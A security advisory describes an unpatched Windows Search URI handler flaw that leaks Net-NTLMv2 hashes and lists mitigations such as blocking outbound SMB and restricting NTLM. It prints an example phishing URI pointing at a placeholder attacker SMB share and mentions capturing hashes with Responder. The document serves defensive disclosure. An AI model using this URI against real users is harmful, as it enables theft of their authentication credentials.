Bright Nexus

Published on June 3, 2026

Windows Search URI Handler Flaw Leaks NTLMv2 Hashes to Attacker-Controlled Servers

Severity

Medium

Detail

A newly disclosed security flaw affecting the Windows Search URI handler allows attackers to capture Net-NTLMv2 authentication hashes from victim systems through a single user interaction. The issue was identified by Huntress and impacts Windows Search functionality through the search: and search-ms: URI schemes. The vulnerability belongs to the same class as CVE-2026-33829, which Microsoft previously patched in the Windows Snipping Tool. However, despite exhibiting similar behavior and security implications, Microsoft has not assigned a CVE identifier or released a security update for this Windows Search variant.

The flaw occurs when a specially crafted search URI includes a crumb=location: parameter pointing to a remote SMB share hosted by an attacker. Once triggered, Windows automatically attempts SMB authentication against the remote host, transmitting the victim’s Net-NTLMv2 hash. This behavior occurs before any error message is displayed to the user. Researchers successfully reproduced the issue on Windows 11 25H2 Pro under default security settings and standard user privileges. The attack requires only a single click on a malicious link and does not require malware installation, file downloads, or elevated privileges.

The issue affects both search: and search-ms: URI schemes because they share the same DelegateExecute COM handler (SearchExecute) within ExplorerFrame.dll. As a result, any input validation weakness within this component impacts both URI handlers. Previous research from Varonis and Trellix documented related attack surfaces involving Windows Search protocols, but the abuse of the crumb=location: parameter for direct NTLM credential leakage appears to be newly disclosed.

How?

The exploit leverages a single-click interaction to trigger automated Windows authentication over SMB. The attack relies on a specially crafted URI containing a remote Universal Naming Convention (UNC) path within the crumb=location: parameter, typically structured as:

search:query=test&crumb=location:\\<attacker_IP>\share

When this link is executed from a command prompt or clicked as a standard HTML hyperlink in a web browser such as Microsoft Edge, Windows immediately invokes the DelegateExecute CLSID {90b9bce2-b6db-4fd3-8451-35917ea1081b}. This causes the operating system to automatically attempt a connection to the specified external SMB server.

Attackers running credential-harvesting tools such as Responder on the remote server can immediately capture the outbound Net-NTLMv2 authentication hash. Notably, the credential leak is triggered only during the first invocation per user logon session. Subsequent attempts within the same session result in an “Access Denied” response without retransmitting the authentication hash.

Affected Components

The following URI handlers and system components are affected:

  • Search URI Protocol Handler: search:
  • Search-MS URI Protocol Handler: search-ms:
  • ExplorerFrame.dll : SearchExecute COM Class / CLSID {90b9bce2-b6db-4fd3-8451-35917ea1081b})

Conclusion

As Microsoft has opted not to issue a standard security patch for this specific search variant, organizations must rely on proactive administrative controls to mitigate risk. This flaw represents a highly effective phishing vector because it requires zero user interaction beyond clicking a link, bypassing traditional security prompts and browser downloads entirely.

Organizations should immediately implement the following security measures:

  • Strictly block outbound TCP port 445 and port 139 at the network perimeter for all hosts that do not have an explicit business need to communicate via external SMB.
  • Enforce SMB signing across the environment and evaluate disabling outbound NTLM traffic entirely (e.g., by configuring the RestrictSendingNTLMTraffic registry group policy to 2 after an appropriate system audit).
  • Configure security information and event management (SIEM) tools to monitor, detect, and alert on any mail or proxy logs containing embedded references to search: and search-ms: URIs.

Source

https://cybersecuritynews.com/windows-search-uri-flaw-leaks-ntlmv2-hashes/

https://thehackernews.com/2026/06/unpatched-windows-search-uri.html